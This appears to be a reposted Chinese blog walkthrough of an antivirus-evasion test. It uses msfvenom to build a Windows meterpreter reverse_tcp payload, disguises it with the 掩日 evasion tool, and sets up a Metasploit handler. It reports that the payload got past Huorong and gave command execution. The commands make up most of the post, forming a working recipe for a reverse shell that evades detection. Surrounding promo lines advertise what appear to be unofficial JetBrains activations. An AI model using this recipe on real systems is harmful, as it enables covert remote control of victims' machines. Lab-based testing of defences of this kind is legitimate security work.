大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。
Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺
微信公众号:乌鸦安全
扫取二维码获取更多信息!
1. 环境
攻击机: kali linux 10.211.55.23
受害机: Windows10 360主动防御
Windows7 火绒主动防御
2. 生成exe文件
在kali linux下使用msfvenom
生成一个64位的exe文件
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.211.55.23 lport=4444 -f exe -o 1.exe
将文件分别发送至Windows10上,此时需要将受害者的机器关闭全部杀软
使用掩日3.0进行免杀处理(这里会提示报错,需要安装一个软件,按照提示安装即可)
下载地址:
https://github.com/1y0n/av_evasion_tool/
将文件直接拖过来就行了
最后会生成一个YR_1.exe
文件
将这两个文件分别压缩备份,发送到window10和window7上
3. 静态测试
打开各自的杀软进行测试
3.1 360
均报毒
3.2 火绒
只有一个文件报毒
4. 上线测试
4.1 攻击机配置
msfconsole
use exploit/multi/handler
set LHOST 10.211.55.23
set LPORT 4444
set payload windows/x64/meterpreter/reverse_tcp
exploit
4.2 360下
4.2.1 1..exe
直接gg
4.2.2 免杀版1.exe
直接gg
4.3 火绒
4.3.1. 1.exe
gg
4.3.2 免杀版1.exe
上线正常
执行命令
5. 总结
总体上来说,这款免杀工具已经是非常强了,而且公开了这么久,还支持部分免杀,很厉害了!?
发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/171412.html原文链接:https://javaforall.cn
【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛
【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...